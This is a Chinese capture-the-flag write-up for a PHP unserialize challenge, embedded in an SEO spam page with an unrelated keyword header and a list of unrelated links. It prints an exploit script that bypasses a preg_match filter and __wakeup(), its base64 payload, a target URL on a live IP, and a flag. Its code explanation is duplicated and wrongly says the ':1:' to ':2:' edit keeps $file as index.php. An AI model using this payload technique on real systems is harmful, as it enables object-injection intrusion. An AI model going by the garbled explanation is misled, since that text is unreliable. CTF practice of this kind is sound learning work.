当前位置: 首页 > news >正文

微信公众号排行榜东莞百度快速排名优化

微信公众号排行榜,东莞百度快速排名优化,跨境支付互联互通,拼多多网站在那里做1、题目描述 2、 3、分析代码 class Demo { private $file fl4g.php; }:定义了一个名为Demo的类,该类有一个私有属性$file,默认值为fl4g.php。 $a serialize(new Demo);:创建了一个Demo类的实例,并对其进行序列化&a…

1、题目描述

2、

3、分析代码

  1. class Demo { private $file = 'fl4g.php'; }:定义了一个名为Demo的类,该类有一个私有属性$file,默认值为fl4g.php

  2. $a = serialize(new Demo);:创建了一个Demo类的实例,并对其进行序列化,然后将序列化后的字符串赋值给变量$a

  3. $a = str_replace('O:4', 'O:+4',$a);:这行代码的目的是绕过preg_match('/[oc]:\d+:/i', $var)这样的正则表达式检查。原始的序列化字符串中,O:4表示的是一个对象,后面的数字4表示类名的长度。通过将4替换为+4,可以使正则表达式无法匹配,从而绕过检查。

  4. $a = str_replace(':1:', ':2:',$a);:这行代码的目的是绕过__wakeup()函数的检查。在__wakeup()函数中,如果$this->file的值不等于index.php,就会被重置为index.php。通过将序列化字符串中的:1:替换为:2:,可以使$this->file的值始终等于index.php,从而绕过检查。

  5. echo base64_encode($a);:最后,将修改后的序列化字符串进行Base64编码,然后输出。

4、根据代码中的提示,我们将fl4g.php进行base64编码后的值传给var,试着访问但是页面没有回显

5、根据题目我们需要进行序列化(代码引用这篇文章:攻防世界之Web_php_unserialize(超详细WP)_php unserialize-CSDN博客)

6、在源代码中我们需要绕过几个函数

<?php
class Demo { private $file = 'fl4g.php';
}
$a = serialize(new Demo);
$a = str_replace('O:4', 'O:+4',$a); //绕过preg_match()函数
$a = str_replace(':1:', ':2:',$a); //绕过__wakeup()函数
echo ($a);                  
?>

7、运行代码可以看到序列后的结果

O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}

将a的值进行编码

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== 

8、

  1. class Demo { private $file = 'fl4g.php'; }:定义了一个名为Demo的类,该类有一个私有属性$file,默认值为fl4g.php

  2. $a = serialize(new Demo);:创建了一个Demo类的实例,并对其进行序列化,然后将序列化后的字符串赋值给变量$a

  3. $a = str_replace('O:4', 'O:+4',$a);:这行代码的目的是绕过preg_match('/[oc]:\d+:/i', $var)这样的正则表达式检查。原始的序列化字符串中,O:4表示的是一个对象,后面的数字4表示类名的长度。通过将4替换为+4,可以使正则表达式无法匹配,从而绕过检查。

  4. $a = str_replace(':1:', ':2:',$a);:这行代码的目的是绕过__wakeup()函数的检查。在__wakeup()函数中,如果$this->file的值不等于index.php,就会被重置为index.php。通过将序列化字符串中的:1:替换为:2:,可以使$this->file的值始终等于index.php,从而绕过检查。

  5. echo base64_encode($a);:最后,将修改后的序列化字符串进行Base64编码,然后输出。

 

9、访问url:61.147.171.105:65034/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

10、

ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

http://www.yayakq.cn/news/970326/

相关文章:

  • 如何在各大网站发布信息上海品牌设计公司有哪些
  • 长春专业做网站的公司排名网站运维服务内容
  • 一个人做网站需要多久中国建设银行甘肃省分行 官方网站
  • 做网站用采集对网站建设的考核机制
  • 网站建设语言环境去黄山旅游攻略
  • 上线了建站怎么样wordpress 整合ck
  • 主流做网站林业网站模板
  • 织梦多语言网站网页qq登录网址
  • 源码哥网站的模板企业网站有哪些举例
  • 扬州网站建设要多少钱佛山高明
  • 哈尔滨企业网站模板建站2017 上海网站备案
  • 如何做代刷网站长公司企业安全文化内容范本
  • 购物网站排名女装建设工程竣工规划局网站
  • 连锁店网站建设78创业商机网
  • 北京服装网站建设各大电商平台的销售数据
  • 企业网站设计过程中必须重视的问题之一人事外包
  • 速卖通网站怎样做店面的二维码房产证
  • 网络品牌营销推广公司杭州seo教程
  • 网站动画用什么做服务器上怎么做网站
  • 北京二手房网站百度获客平台怎么收费的
  • 网站开发 功能不会写wordpress能赚钱
  • 工厂网站怎么做网站开发单位
  • 怎样利用网站做引流网站开发必学的技巧有哪些
  • 品牌网站建设基本流程wordpress建站两秒打开
  • 二手房地产中介网站建设企业网站初始期如何优化
  • 广州汽车网站建设建筑外观设计网站推荐
  • 报网站开发培训班哪些网站是用织梦做的
  • 做亚马逊有看数据的网站吗郑州 做网站
  • 企业网站建设费多少钱c2c网站建设的需求分析
  • 做网站应该用什么镜像做业务不花钱的网站有哪些